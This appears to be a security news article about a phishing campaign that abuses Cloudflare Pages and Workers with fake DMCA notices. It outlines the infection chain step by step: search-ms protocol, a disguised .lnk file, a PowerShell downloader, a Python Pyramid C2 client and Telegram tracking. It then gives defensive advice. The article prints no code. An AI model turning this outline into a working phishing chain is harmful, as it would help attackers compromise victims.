Listen to this Post
A New Wave of Phishing Threats
Cybersecurity researchers have recently uncovered a highly sophisticated phishing campaign operated by a Russian-speaking threat actor. The attackers exploit Cloudflare’s Pages and Workers services to create phishing sites disguised as legitimate DMCA takedown notices. These deceptive pages trick victims into downloading malicious files, initiating a complex infection chain. The attack involves Telegram-based victim tracking and Pyramid Command-and-Control (C2) infrastructure, allowing hackers to control compromised systems remotely.
This discovery highlights how cybercriminals are abusing trusted online services to evade detection and increase the effectiveness of their phishing tactics. Let’s break down how this campaign works and why it poses a significant risk.
How the Phishing Attack Works
1. Hosting Malicious Pages on Cloudflare Services
The attackers use Cloudflare Pages and Workers, which are typically used for hosting static websites and running JavaScript functions. Instead of legitimate use, these cybercriminals create phishing pages on domains ending in “pages.dev” and “workers.dev”. These pages impersonate secure document-sharing services, specifically targeting users with fake DMCA infringement notices.
2. Using Windows Protocol Exploits
Victims are lured into downloading a file via the “search-ms” protocol, which opens a Windows Explorer window. The download appears to be a legitimate document but is actually a Windows shortcut (.lnk) file disguised as a PDF.
3. Malicious Payload Delivery
Once executed, the shortcut triggers a PowerShell script, which downloads a ZIP archive containing both legitimate and malicious files. Within this package, a Python script is designed to establish communication with the Pyramid C2 servers, allowing hackers to remotely control infected devices.
4. Telegram-Based Tracking
A key innovation in this phishing campaign is the use of Telegram for victim tracking. The PowerShell script “kozlina2.ps1” contains hardcoded Telegram bot credentials. These allow the attackers to collect infected devices’ IP addresses and transmit them to a Telegram channel named “ПШ КОД ЗАПУСК” (“PS CODE LAUNCH”).
Several accounts linked to this activity have been identified:
– @tyyndrabot – Collects and receives IP addresses
– @pups2131 – Administrator of the channel
- Skandi – A group member whose role is unclear
5. Advancements in Obfuscation
The attackers are making incremental improvements to their techniques. The Python script “kursor.py” now contains additional junk characters in its configuration strings before decoding, making analysis slightly more difficult. While this is not a groundbreaking evasion method, it indicates the attackers’ ongoing efforts to bypass detection.
6. Abuse of Trusted Services
This campaign highlights the growing misuse of platforms like Cloudflare and Telegram by cybercriminals. By leveraging well-known and trusted services, hackers can disguise their early-stage attacks more effectively, making detection and prevention more challenging for cybersecurity teams.
What Undercode Says:
The recent phishing attack exposes several alarming cybersecurity trends. Let’s analyze the key takeaways and implications of this campaign:
1. Weaponizing Legitimate Services
Cloudflare and Telegram are not inherently malicious platforms, but hackers continue to exploit them for cybercrime. This presents a significant challenge for defenders, as blocking these platforms outright is not practical for businesses and individuals who rely on them. Instead, companies must implement monitoring mechanisms to track unusual activity linked to these services.
2. The Growing Role of Telegram in Cybercrime
Telegram has become a favorite command-and-control tool for cybercriminals. Its encryption and ease of use provide attackers with a discreet way to manage their operations. In this case, Telegram bots play a crucial role in tracking infected devices. Cybersecurity professionals must remain vigilant and monitor how attackers leverage messaging apps for malicious purposes.
3. The “search-ms” Protocol as an Attack Vector
The use of the “search-ms” protocol in this attack demonstrates how hackers are finding new ways to bypass traditional security measures. Many organizations do not actively monitor or restrict protocol handlers, allowing such attacks to go unnoticed. IT administrators should consider limiting or disabling unnecessary Windows protocol handlers to reduce the risk of exploitation.
4. The Evolving Landscape of Phishing Attacks
Phishing is no longer just about deceptive emails. Attackers are now incorporating multi-stage infection chains, advanced obfuscation techniques, and trusted third-party services to increase the success rate of their campaigns. This emphasizes the need for:
– User awareness training to recognize phishing attempts
- Endpoint detection and response (EDR) solutions to catch suspicious scripts
- Regular security assessments to identify and patch vulnerabilities
5. The Future of Cybersecurity Defense
As attackers refine their tactics, cybersecurity strategies must also evolve. Threat intelligence sharing, real-time monitoring, and AI-driven analysis will be crucial in identifying and stopping such advanced threats. Organizations should:
– Keep software and security tools updated
– Implement zero-trust security models
– Stay informed on the latest phishing tactics
By proactively adapting to emerging threats, businesses and individuals can reduce the risk of falling victim to sophisticated cyberattacks.
Fact Checker Results:
✅ Cloudflare’s Pages and Workers services are legitimate but are being abused by cybercriminals – Attackers are misusing these trusted platforms to host phishing pages, making detection harder.
✅ Telegram is increasingly being used for cybercrime operations – The encrypted messaging platform has become a go-to for attackers, particularly in managing phishing campaigns.
✅ The “search-ms” protocol can be exploited for malware delivery – This attack highlights the risks of unmonitored protocol handlers, suggesting organizations should consider restricting their use.
Cybersecurity threats are constantly evolving, and this phishing campaign is a clear example of how attackers are adapting their methods to evade detection. Stay alert, update your security protocols, and educate yourself on the latest cyber risks. Phishing is no longer just an email problem—it’s a multi-platform battle.
References:
Reported By: https://cyberpress.org/cloudflare-abused-by-hackers/
Extra Source Hub:
https://www.reddit.com
Wikipedia
Undercode AI
Image Source:
Pexels
Undercode AI DI v2
